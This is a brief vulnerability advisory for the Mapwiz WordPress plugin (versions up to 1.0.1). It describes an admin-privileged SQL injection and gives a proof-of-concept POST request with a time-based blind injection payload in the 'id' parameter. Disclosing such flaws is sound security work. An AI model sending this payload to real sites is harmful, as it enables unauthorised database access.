Mapwiz <= 1.0.1 - Admin+ SQLi

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.

PoC

POST /wp-admin/admin.php?page=myplug/muyplg.php&mid; HTTP/1.1 geoSearch=&markerTitle;%5B%5D=&latitude;%5B%5D=0&longitude;%5B%5D=0&searchlocation;%5B%5D=&showInfoWindow;%5B%5D=0&imageTitle;%5B%5D=&imageUrl;%5B%5D=&bodyTextH1;%5B%5D=&bodyTextP1;%5B%5D=&bodyTextP2;%5B%5D=&bodyTextUrl;%5B%5D=&labelTitle;%5B%5D=&markerVisible;%5B%5D=1&labelTextColor;%5B%5D=%23f4af0a&strokeColor;%5B%5D=5&labelStrokeColor;%5B%5D=%23f31a33&labelStrokeWeight;%5B%5D=4&markerICON;%5B%5D=map-icon-map-pin&markerType;%5B%5D=svg&fillColor;%5B%5D=%234613ec&markerStrokeColor;%5B%5D=%237f9819&markerStrokeWeight;%5B%5D=3&mapWidth;=100&mapWidthUnit;=%25&mapHeight;=800&settingZoom;=2&settingMapType;=ROADMAP&settingLocalization;=ar&settingZoomControl;=none&settingZoomControlPosition;=TOP_LEFT&settingStreetView;=none&settingStreetViewPosition;=TOP_LEFT&settingMapControlType;=none&settingMapControlTypePosition;=TOP_LEFT&settingDraggableMap;=true&settingDoubleClickZoom;=none&settingMouseScroll;=true&SaveMap;=2&id;=2+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)&featuredMap;=